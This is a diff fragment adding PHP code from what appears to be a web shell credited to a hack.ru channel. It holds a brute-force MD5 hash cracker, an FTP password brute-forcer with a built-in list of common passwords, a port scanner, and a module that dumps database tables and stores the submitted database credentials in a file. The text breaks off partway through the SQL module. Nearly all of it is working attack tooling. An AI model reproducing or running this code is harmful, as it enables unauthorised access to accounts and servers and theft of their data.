+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:?.,&quot;')>[Symvols]</a><br><br>
+
+<font color=red><b><u>RUS:</u></b></font>
+
+<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a>
+
+<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a>
+
+</td></tr>
+
+<tr><td align=center width=400>
+
+<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+if($_POST[pass_de]){
+
+$pass_de=htmlspecialchars($pass_de);
+
+$pass_de=stripslashes($pass_de);
+
+$dat=date("H:i:s");
+
+$date=date("d:m:Y");
+
+
+
+crack_md5();
+
+}
+
+}
+
+
+
+function crack_md5() {
+
+global $chars_de;
+
+$chars=$_POST[chars];
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+$chars_de=str_replace("<",chr(60),$chars_de);
+
+$chars_de=str_replace(">",chr(62),$chars_de);
+
+$c=strlen($chars_de);
+
+for ($next = 0; $next <= 31; $next++) {
+
+for ($i1 = 0; $i1 <= $c; $i1++) {
+
+$word[1] = $chars_de{$i1};
+
+for ($i2 = 0; $i2 <= $c; $i2++) {
+
+$word[2] = $chars_de{$i2};
+
+if ($next <= 2) {
+
+result(implode($word));
+
+}else {
+
+for ($i3 = 0; $i3 <= $c; $i3++) {
+
+$word[3] = $chars_de{$i3};
+
+if ($next <= 3) {
+
+result(implode($word));
+
+}else {
+
+for ($i4 = 0; $i4 <= $c; $i4++) {
+
+$word[4] = $chars_de{$i4};
+
+if ($next <= 4) {
+
+result(implode($word));
+
+}else {
+
+for ($i5 = 0; $i5 <= $c; $i5++) {
+
+$word[5] = $chars_de{$i5};
+
+if ($next <= 5) {
+
+result(implode($word));
+
+}else {
+
+for ($i6 = 0; $i6 <= $c; $i6++) {
+
+$word[6] = $chars_de{$i6};
+
+if ($next <= 6) {
+
+result(implode($word));
+
+}else {
+
+for ($i7 = 0; $i7 <= $c; $i7++) {
+
+$word[7] = $chars_de{$i7};
+
+if ($next <= 7) {
+
+result(implode($word));
+
+}else {
+
+for ($i8 = 0; $i8 <= $c; $i8++) {
+
+$word[8] = $chars_de{$i8};
+
+if ($next <= 8) {
+
+result(implode($word));
+
+}else {
+
+for ($i9 = 0; $i9 <= $c; $i9++) {
+
+$word[9] = $chars_de{$i9};
+
+if ($next <= 9) {
+
+result(implode($word));
+
+}else {
+
+for ($i10 = 0; $i10 <= $c; $i10++) {
+
+$word[10] = $chars_de{$i10};
+
+if ($next <= 10) {
+
+result(implode($word));
+
+}else {
+
+for ($i11 = 0; $i11 <= $c; $i11++) {
+
+$word[11] = $chars_de{$i11};
+
+if ($next <= 11) {
+
+result(implode($word));
+
+}else {
+
+for ($i12 = 0; $i12 <= $c; $i12++) {
+
+$word[12] = $chars_de{$i12};
+
+if ($next <= 12) {
+
+result(implode($word));
+
+}else {
+
+for ($i13 = 0; $i13 <= $c; $i13++) {
+
+$word[13] = $chars_de{$i13};
+
+if ($next <= 13) {
+
+result(implode($word));
+
+}else {
+
+for ($i14 = 0; $i14 <= $c; $i14++) {
+
+$word[14] = $chars_de{$i14};
+
+if ($next <= 14) {
+
+result(implode($word));
+
+}else {
+
+for ($i15 = 0; $i15 <= $c; $i15++) {
+
+$word[15] = $chars_de{$i15};
+
+if ($next <= 15) {
+
+result(implode($word));
+
+}else {
+
+for ($i16 = 0; $i16 <= $c; $i16++) {
+
+$word[16] = $chars_de{$i16};
+
+if ($next <= 16) {
+
+result(implode($word));
+
+}else {
+
+for ($i17 = 0; $i17 <= $c; $i17++) {
+
+$word[17] = $chars_de{$i17};
+
+if ($next <= 17) {
+
+result(implode($word));
+
+}else {
+
+for ($i18 = 0; $i18 <= $c; $i18++) {
+
+$word[18] = $chars_de{$i18};
+
+if ($next <= 18) {
+
+result(implode($word));
+
+}else {
+
+for ($i19 = 0; $i19 <= $c; $i19++) {
+
+$word[19] = $chars_de{$i19};
+
+if ($next <= 19) {
+
+result(implode($word));
+
+}else {
+
+for ($i20 = 0; $i20 <= $c; $i20++) {
+
+$word[20] = $chars_de{$i20};
+
+if ($next <= 20) {
+
+result(implode($word));
+
+}else {
+
+for ($i21 = 0; $i21 <= $c; $i21++) {
+
+$word[21] = $chars_de{$i21};
+
+if ($next <= 21) {
+
+result(implode($word));
+
+}else {
+
+for ($i22 = 0; $i22 <= $c; $i22++) {
+
+$word[22] = $chars_de{$i22};
+
+if ($next <= 22) {
+
+result(implode($word));
+
+}else {
+
+for ($i23 = 0; $i23 <= $c; $i23++) {
+
+$word[23] = $chars_de{$i23};
+
+if ($next <= 23) {
+
+result(implode($word));
+
+}else {
+
+for ($i24 = 0; $i24 <= $c; $i24++) {
+
+$word[24] = $chars_de{$i24};
+
+if ($next <= 24) {
+
+result(implode($word));
+
+}else {
+
+for ($i25 = 0; $i25 <= $c; $i25++) {
+
+$word[25] = $chars_de{$i25};
+
+if ($next <= 25) {
+
+result(implode($word));
+
+}else {
+
+for ($i26 = 0; $i26 <= $c; $i26++) {
+
+$word[26] = $chars_de{$i26};
+
+if ($next <= 26) {
+
+result(implode($word));
+
+}else {
+
+for ($i27 = 0; $i27 <= $c; $i27++) {
+
+$word[27] = $chars_de{$i27};
+
+if ($next <= 27) {
+
+result(implode($word));
+
+}else {
+
+for ($i28 = 0; $i28 <= $c; $i28++) {
+
+$word[28] = $chars_de{$i28};
+
+if ($next <= 28) {
+
+result(implode($word));
+
+}else {
+
+for ($i29 = 0; $i29 <= $c; $i29++) {
+
+$word[29] = $chars_de{$i29};
+
+if ($next <= 29) {
+
+result(implode($word));
+
+}else {
+
+for ($i30 = 0; $i30 <= $c; $i30++) {
+
+$word[30] = $chars_de{$i30};
+
+if ($next <= 30) {
+
+result(implode($word));
+
+}else {
+
+for ($i31 = 0; $i31 <= $c; $i31++) {
+
+$word[31] = $chars_de{$i31};
+
+if ($next <= 31) {
+
+result(implode($word));
+
+
+
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+
+
+function result($word) {
+
+global $dat,$date;
+
+$pass_de=$_POST[pass_de];
+
+$dat2=date("H:i:s");
+
+$date2=date("d:m:Y");
+
+
+
+if(md5($word)==$pass_de){
+
+print "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Brutefrcing result:</td></tr>
+
+  <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>crypted Hash:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce start:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce finish:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;result was wrote to file:  <b>".$word."_md5</b></td></tr>
+
+</table>
+
+                            ";
+
+							$f=@fopen($word._md5,"a+");
+
+                            fputs($f,"Decrypted MD5 hash [$pass_de] = $word\nBruteforce start:\t$dat - $date\Bruteforce finish:\t$dat2 - $date2\n ");
+
+                             exit;}
+
+
+
+
+
+
+
+}
+
+
+
+function brut_ftp() {
+
+ global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>FTP bruteforce</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload . </blockquote></td></tr>
+
+</table>";
+
+
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Brut FTP:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>FTP bruteforce</b>(full bruteforce, you are only to enter a value of number of passwords and brute will begin from password-list file, which script generates itself on the fly!)</td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Number of passwords:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='chislo' size=10></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Password to test:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='proverka' size=50></td></tr>
+
+<tr><td width=500 align=center colspan=2><input type='submit' value='FTP brute start' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+function s() {
+
+   $word="qwrtypsdfghjklzxcvbnm";
+
+   return $word[mt_rand(0,strlen($word)-1)];
+
+}
+
+
+
+function g() {
+
+   $word="euioam";
+
+   return $word[mt_rand(0,strlen($word)-2)];
+
+}
+
+
+
+function name0() {   return s().g().s();                        }
+
+function name1() {   return s().g().s().g();                    }
+
+function name2() {   return s().g().g().s();                    }
+
+function name3() {   return s().s().g().s().g();                }
+
+function name4() {   return g().s().g().s().g();                }
+
+function name5() {   return g().g().s().g().s();                }
+
+function name6() {   return g().s().s().g().s();                }
+
+function name7() {   return s().g().g().s().g();                }
+
+function name8() {   return s().g().s().g().g();                }
+
+function name9() {   return s().g().s().g().s().g();            }
+
+function name10() {   return s().g().s().s().g().s().s();        }
+
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+
+
+function randword() {
+
+   global $cool;
+
+   $func="name".mt_rand(0,11);
+
+   $func2="name".mt_rand(0,11);
+
+   switch (mt_rand(0,11)) {
+
+      case 0: return $func().mt_rand(5,99);
+
+      case 1: return $func()."-".$func2();
+
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+
+      case 3: return $func()."!".$func();
+
+      case 4: return randpass(mt_rand(5,12));
+
+      default: return $func();
+
+   }
+
+
+
+
+
+}
+
+
+
+function randpass($len) {
+
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+
+   $s="";
+
+   for ($i=0; $i<$len; $i++) {
+
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+
+   }
+
+   return $s;
+
+}
+
+if (@unlink("pass.txt") < 0){
+
+echo "nothing";
+
+exit;
+
+}
+
+$file="pass.txt";
+
+if($file && $host && $login){
+
+   $cn=mt_rand(30,30);
+
+for ($i=0; $i<$cn; $i++) {
+
+   $s=$cool2[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$s\n");
+
+   }
+
+
+
+  $cnt2=mt_rand(43,43);
+
+for ($i=0; $i<$cnt2; $i++) {
+
+   $r=$cool[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$login$r\n");
+
+}
+
+$p="$proverka";
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$p\n");
+
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+
+   for ($i=0; $i<$cnt3; $i++) {
+
+   $u=randword();
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$u\n");
+
+  }
+
+
+
+  if(is_file($file)){
+
+ $passwd=file($file,1000);
+
+  for($i=0; $i<count($passwd); $i++){
+
+   $stop=false;
+
+   $password=trim($passwd[$i]);
+
+   $open_ftp=@fsockopen($host,21);
+
+    if($open_ftp!=false){
+
+     fputs($open_ftp,"user $login\n");
+
+     fputs($open_ftp,"pass $password\n");
+
+     while(!feof($open_ftp) && $stop!=true){
+
+      $text=fgets($open_ftp,4096);
+
+      if(preg_match("/230/",$text)){
+
+       $stop=true;
+
+	   $f=@fopen($host._ftp,"a+");
+
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+
+
+       echo "
+
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Congratulations! Password is known now.</font></b><br>
+
+&nbsp;&nbsp;Connected to: <b>$host</b><br>&nbsp;&nbsp;with login: <b>$login</b><br>&nbsp;&nbsp;with password: <b>$password</b></td></tr></table>
+
+";exit;
+
+      }
+
+      elseif(preg_match("/530/",$text)){
+
+       $stop=true;
+
+
+
+      }
+
+     }
+
+     fclose($open_ftp);
+
+   }else{
+
+    echo "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>FTP is incorrect!!! At <b><u>$host</u></b> 21 port is closed! check your settings</b></b></td></tr>
+
+</table>
+
+";exit;
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+}
+
+
+
+# port scanner
+
+function portscan() {
+
+ global $action,$portscan,$port,$HTTP_HOST,$min,$max;
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time1 = $mtime;
+
+
+
+ $id = $HTTP_HOST;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Scan results:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >Scanning host to find any reachable and open ports" . "...<br></td></tr></table>";
+
+
+
+ $lport = $min;
+
+ $hport = $max;
+
+ $op = 0;
+
+ $gp = 0;
+
+
+
+ for ($porta=$lport; $porta<=$hport; $porta++) {
+
+  $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4);
+
+  if ( !$fp ) { $gp++; }
+
+  else {
+
+   $port_addres = $port[$porta];
+
+   if($port_addres == "") $port_addres = "unknown";
+
+   $serv = getservbyport($porta, TCP);
+
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>What's the service is?</a>)</td></tr>";
+
+   $op++;
+
+  }
+
+ }
+
+
+
+ if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Current host seems don't have any open port...hmm, but you're connected to it to 80...check out firewall</b></td></tr></table>";
+
+
+
+ $unsi = ($op/$porta)*100;
+
+ $unsi = round($unsi);
+
+
+
+ echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Scan statistics:</b></b></td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Scanned ports:</b>&nbsp;&nbsp;$porta</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Open ports:</b>&nbsp;&nbsp;$op</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Closed ports:</b>&nbsp;&nbsp;$gp</td></tr>";
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time2 = $mtime;
+
+ $loadtime = ($time2 - $time1);
+
+ $loadtime = round($loadtime, 2);
+
+
+
+ echo "<tr colspan=2><td align=center width=100% colspan=3><b>Scan time:</b>&nbsp;&nbsp;$loadtime seconds</tr></table>";
+
+}
+
+
+
+function nfm_copyright() {
+
+global $action,$upass,$uname,$nfm;
+
+ return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>";
+
+
+
+}
+
+// =-=-=-=-= SQL MODULE =-=-=-=-=
+
+// SQL functions start
+
+function aff_date() {
+
+ $date_now=date("F j,Y,g:i a");
+
+ return $date_now;
+
+}
+
+
+
+function sqldumptable($table) {
+
+ global $sv_s,$sv_d,$drp_tbl;
+
+ $tabledump = "";
+
+ if ($sv_s) {
+
+  if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; }
+
+  $tabledump.="CREATE TABLE $table (\n";
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $tabledump.=",\n"; }
+
+   else { $firstfield=0;}
+
+   $tabledump.=" $champ[Field] $champ[Type]";
+
+   if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";}
+
+   if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";}
+
+   if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";}
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $keys=mysql_query("SHOW KEYS FROM $table");
+
+  while ($key=mysql_fetch_array($keys)) {
+
+   $kname=$key['Key_name'];
+
+   if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";}
+
+   if(!is_array($index[$kname])) { $index[$kname]=array();}
+
+   $index[$kname][]=$key['Column_name'];
+
+  }
+
+
+
+  @mysql_free_result($keys);
+
+  while(list($kname,$columns)=@each($index)) {
+
+   $tabledump.=",\n";
+
+   $colnames=implode($columns,",");
+
+   if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";}
+
+   else {
+
+    if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);}
+
+    $tabledump.=" KEY $kname ($colnames)";
+
+   }
+
+  }
+
+  $tabledump.="\n);\n\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $tabledump.="INSERT INTO $table VALUES(";
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $tabledump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) {$tabledump.="NULL";}
+
+    else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";}
+
+   }
+
+   $tabledump.=");\n";
+
+  }
+
+  @mysql_free_result($rows);
+
+ }
+
+
+
+ return $tabledump;
+
+}
+
+
+
+function csvdumptable($table) {
+
+ global $sv_s,$sv_d;
+
+ $csvdump="## Table:$table \n\n";
+
+ if ($sv_s) {
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $csvdump.=",";}
+
+   else { $firstfield=0;}
+
+   $csvdump.="'".$champ['Field']."'";
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $csvdump.="\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $csvdump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) { $csvdump.="NULL";}
+
+    else { $csvdump.="'".addslashes($row[$cptchamp])."'";}
+
+   }
+
+   $csvdump.="\n";
+
+  }
+
+ }
+
+
+
+ @mysql_free_result($rows);
+
+ return $csvdump;
+
+}
+
+
+
+function write_file($data) {
+
+ global $g_fp,$file_type;
+
+ if ($file_type==1) { gzwrite($g_fp,$data); }
+
+ else { fwrite ($g_fp,$data); }
+
+}
+
+
+
+function open_file($file_name) {
+
+ global $g_fp,$file_type,$dbbase,$f_nm;
+
+ if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); }
+
+ else { $g_fp=fopen ($file_name,"w"); }
+
+
+
+ $f_nm[]=$file_name;
+
+ $data="";
+
+ $data.="##\n";
+
+ $data.="## NFM hack.ru creator \n";
+
+ $data.="##-------------------------\n";
+
+ $data.="## Date:".aff_date()."\n";
+
+ $data.="## Base:$dbbase \n";
+
+ $data.="##-------------------------\n\n";
+
+ write_file($data);
+
+ unset($data);
+
+}
+
+
+
+function file_pos() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { return gztell ($g_fp); }
+
+ else { return ftell ($g_fp); }
+
+}
+
+
+
+function close_file() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { gzclose ($g_fp); }
+
+ else { fclose ($g_fp); }
+
+}
+
+
+
+function split_sql_file($sql) {
+
+ $morc=explode(";",$sql);
+
+ $sql="";
+
+ $output=array();
+
+ $matches=array();
+
+ $morc_cpt=count($morc);
+
+ for ($i=0;$i < $morc_cpt;$i++) {
+
+  if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) {
+
+   $total_quotes=preg_match_all("/'/",$morc[$i],$matches);
+
+   $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches);
+
+   $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+   if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; }
+
+   else {
+
+    $temp=$morc[$i].";";
+
+    $morc[$i]="";
+
+    $complete_stmt=false;
+
+    for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) {
+
+     $total_quotes = preg_match_all("/'/",$morc[$j],$matches);
+
+     $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches);
+
+     $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+     if (($unescaped_quotes % 2)==1) {
+
+      $output[]=$temp.$morc[$j];
+
+      $morc[$j]="";
+
+      $temp="";
+
+      $complete_stmt=true;
+
+      $i=$j;
+
+     } else {
+
+      $temp.=$morc[$j].";";
+
+      $morc[$j]="";
+
+     }
+
+    }
+
+   }
+
+  }
+
+ }
+
+ return $output;
+
+}
+
+
+
+function split_csv_file($csv) { return explode("\n",$csv); }
+
+// SQL functions END
+
+
+
+// main SQL()
+
+function sql() {
+
+ global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm;
+
+ $secu_config="xtdump_conf.inc.php";
+
+ $dbhost=$_POST['dbhost'];
+
+ $dbuser=$_POST['dbuser'];
+
+ $dbpass=$_POST['dbpass'];
+
+ $dbbase=$_POST['dbbase'];
+
+ $tbls =$_POST['tbls'];
+
+ $sqlaction =$_POST['sqlaction'];
+
+ $secu =$_POST['secu'];
+
+ $f_cut =$_POST['f_cut'];
+
+ $fz_max =$_POST['fz_max'];
+
+ $opt =$_POST['opt'];
+
+ $savmode =$_POST['savmode'];
+
+ $file_type =$_POST['file_type'];
+
+ $ecraz =$_POST['ecraz'];
+
+ $f_tbl =$_POST['f_tbl'];
+
+ $drp_tbl=$_POST['drp_tbl'];
+
+
+
+ $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>";
+
+ $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-go back-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright();
+
+
+
+ // SQL actions STARTS
+
+
+
+ if ($sqlaction=='save') {
+
+  if ($secu==1) {
+
+   $fp=fopen($secu_config,"w");
+
+   fputs($fp,"<?php\n");
+
+   fputs($fp,"\$dbhost='$dbhost';\n");
+
+   fputs($fp,"\$dbbase='$dbbase';\n");
+
+   fputs($fp,"\$dbuser='$dbuser';\n");
+
+   fputs($fp,"\$dbpass='$dbpass';\n");
+
+   fputs($fp,"?>");
+
+   fclose($fp);
+
+  }
+
+  if (!is_array($tbls)) {
+
+   echo $header."<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">
+
+<br><center><font color=red>You forgot to check tables, which you need to dump =)</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+  if($f_cut==1) {
+
+   if (!is_numeric($fz_max)) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une valeur num?rique ? la taille du fichier ? scinder.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+   if ($fz_max < 200000) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une taille de fichier a scinder sup
+
+    rieure ? 200 000 Octets.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+  }
+
+
+
+  $tbl=array();
+
+  $tbl[]=reset($tbls);
+
+  if (count($tbls) > 1) {
+
+   $a=true;
+
+   while ($a !=false) {
+
+    $a=next($tbls);
+
+    if ($a !=false) { $tbl[]=$a; }
+
+   }
+
+  }
+
+
+
+  if ($opt==1) { $sv_s=true; $sv_d=true; }
+
+  else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; }
+
+  else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; }
+
+  else { exit; }
+
+
+
+  $fext=".".$savmode;
+
+  $fich=$dbbase.$fc.$fext;
+
+  $dte="";
+
+  if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz="";
+
+  if ($file_type=='1') { $gz.=".gz"; }
+
+  $fcut=false;
+
+  $ftbl=false;
+
+  $f_nm=array();
+
+  if($f_cut==1) { $fcut=true;$fz_max=$fz_max;$nbf=1;$f_size=170;}
+
+  if($f_tbl==1) { $ftbl=true; }
+
+  else {
+
+   if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); }
+
+   else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); }
+
+  }
+
+
+
+  $nbf=1;
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  mysql_select_db($dbbase);
+
+  if ($fext==".sql") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);
+
+      $nbf=0;
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); }
+
+      }
+
+      close_file();
+
+     }
+
+     else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    $tblsv="";
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz);
+
+        write_file($val.";");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+  else if ($fext==".csv") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
